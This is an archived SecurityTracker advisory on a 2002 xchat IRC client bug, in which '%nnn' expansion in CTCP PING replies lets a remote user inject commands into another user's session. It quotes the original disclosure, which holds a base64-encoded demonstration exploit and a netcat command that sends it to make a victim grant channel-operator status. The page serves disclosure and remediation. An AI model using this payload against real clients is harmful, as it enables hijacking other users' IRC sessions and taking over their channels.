SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Generic)  >   Xchat Vendors:   Zelezny, Peter
Xchat IRC Client Character Expansion Bug Lets a Remote User Hijack Another User's Session and Cause Commands to Be Sent to the IRC Server from the Hijacked Client
SecurityTracker Alert ID:  1003178
SecurityTracker URL:  http://securitytracker.com/id/1003178
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 10 2002
Impact:   Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.4.2 and 1.4.3
Description:   A vulnerability was reported in the xchat IRC chat client. A remote user can hijack another user's session and cause the other user's xchat client to send commands to the client's current IRC server.

It is reported that the CTCP PING reply handler is designed to return the string that was sent to it by another client to determine the time lag between the two systems. The xchat client apparently has another feature that allows the insertion of arbitrary ascii valued characters into a message using the format "%nnn". The PING reply handler reportedly expands the "%nnn" values in replies in the vulnerable clients. A remote user can send malicious commands separate by "%010" line feed characters that will be executed by the client.

A demonstration exploit is provided in the Source Message (it is Base 64 encoded).
Impact:   A remote user can hijack another user's session and cause the other user's xchat client to send commands to the client's current IRC server.
Solution:   The vendor has provided the following workaround to disable ASCII expansion:

/set percascii 0

Also, a fixed version (1.8.7) is available at the Vendor URL.
Vendor URL:  www.xchat.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:   Linux (Any), MacOS, UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Debian Issues Fix) Xchat IRC Client Character Expansion Bug Lets a Remote User Hijack Another User's Session and Cause Commands to Be Sent to the IRC Server from the Hijacked Client   (joey@debian.org (Martin Schulze))
The vendor has released a fix.
(Red Hat Issues Fix) Xchat IRC Client Character Expansion Bug Lets a Remote User Hijack Another User's Session and Cause Commands to Be Sent to the IRC Server from the Hijacked Client   (bugzilla@redhat.com)
The vendor has released a fix.
(Mandrake Issues Fix) Xchat IRC Client Character Expansion Bug Lets a Remote User Hijack Another User's Session and Cause Commands to Be Sent to the IRC Server from the Hijacked Client   (Mandrake Linux Security Team <security@linux-mandrake.com>)
The vendor has released a fix.
(Conectiva Issues Fix) Xchat IRC Client Character Expansion Bug Lets a Remote User Hijack Another User's Session and Cause Commands to Be Sent to the IRC Server from the Hijacked Client   (secure@conectiva.com.br)
The vendor has released a fix.


 Source Message Contents
Date:  Wed, 9 Jan 2002 22:45:13 +1300 (NZDT)
Subject:  xchat IRC session hijacking vulnerability (versions 1.4.1, 1.4.2)


---1463783680-382694448-1010569513=:26663
Content-Type: TEXT/PLAIN; charset=US-ASCII

==========================================================================
======= xchat 1.4.2 and 1.4.3 IRC session hijacking vulnerability ========
==========================================================================

  It is possible to trick xchat IRC clients (1.4.2, 1.4.3) into sending 
  commands to the IRC server they are on, potentially allowing for social 
  engineering attacks, channel takeovers, and denial of service.

               Vendor updates for affected versions soon.

==========================================================================
================================ Background ==============================
==========================================================================

The CTCP PING reply handler is designed to return the string that was sent
to it by another client. This enables that client to determine the time 
lag between them and another user.

The querying client types
  /ping nick
which sends a command of the form:
  PRIVMSG nick :\x01PING 1027050764\x01\n

Where "1027050764" was some representation of the current time, and \x01 
is the character with the ASCII value 0x01.
The queried client would respond with:
  NOTICE nick :\xPING 1027050764\x01\n
and the querying client would then compare the current time with the time 
in the string.

If you sent "test 1 2 3 4" as the time part, xchat would reply with the 
same string.

The xchat client also has a feature which allows insertion of arbitrary 
ascii valued characters into a message. 

The message "This is %065 test." gets sent as "This is A test." to the
server. (This option is disabled by default in later versions.)

If these expressions are expanded on the sending client, a ping messsage
could be sent to a user with the command:
  /msg nick %001PING 12345678%001 
which would send a string like:
  PRIVMSG nick :\x01PING 12345678\x01

(To disable expansion in xchat when you are typing them, use '%%nnn' to 
send the '%nnn' literal. Eg: to send '%100x', type '%%100x' in the 
client. If your client does expansion, it would show up as 'dx', which 
can be quite annoying when discussing format strings.)

==========================================================================
=============================== The Problem ==============================
==========================================================================

The PING reply handler also expands the %nnn values in replies in the 
vulnerable clients.

Example exploit, By Marcus Meissner <Marcus.Meissner@caldera.de>

#fupp is a channel.
Victim is on it and has channel op status.


Enter the command: cat xchat.exploit - | netcat server 6667 

(The - is necessary so we do not quit instantely)

This causes vulnerable 'Victim' to give user 'exploit' channel operator
status in channel '#fupp' on server 'server'.


-- zen-parse

========================================================================== 
=         ObSpam: http://mp3.com/cosv/ - You know I want you to.         = 
========================================================================== 
= 1337sp34|< @ |r(://|r(.pu||thep|ug.(0m/ {#r00th@t,#s0c|a|} @n|) 5tuff. =
==========================================================================
-------------------------------------------------------------------------
1) If this message was posted to a public forum by zen-parse@gmx.net, it 
may be redistributed without modification. 
2) In any other case the contents of this message is confidential and not 
to be distributed in any form without express permission from the author.

---1463783680-382694448-1010569513=:26663
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="xchat.exploit"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.33.0201092245130.26663@clarity.local>
Content-Description: 
Content-Disposition: attachment; filename="xchat.exploit"

dXNlciBleHBsb2l0IGZvbyBiYXI6IEV4cGxvaXQgVGVzdGVyDQpuaWNrIEV4
cGxvaXQNCmpvaW4gI2Z1cHANCnByaXZtc2cgVmljdGltIDoBUElORyAxJTAx
ME1PREUgI2Z1cHAgK28gRXhwbG9pdCUwMTABDQoNCg==
---1463783680-382694448-1010569513=:26663--


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC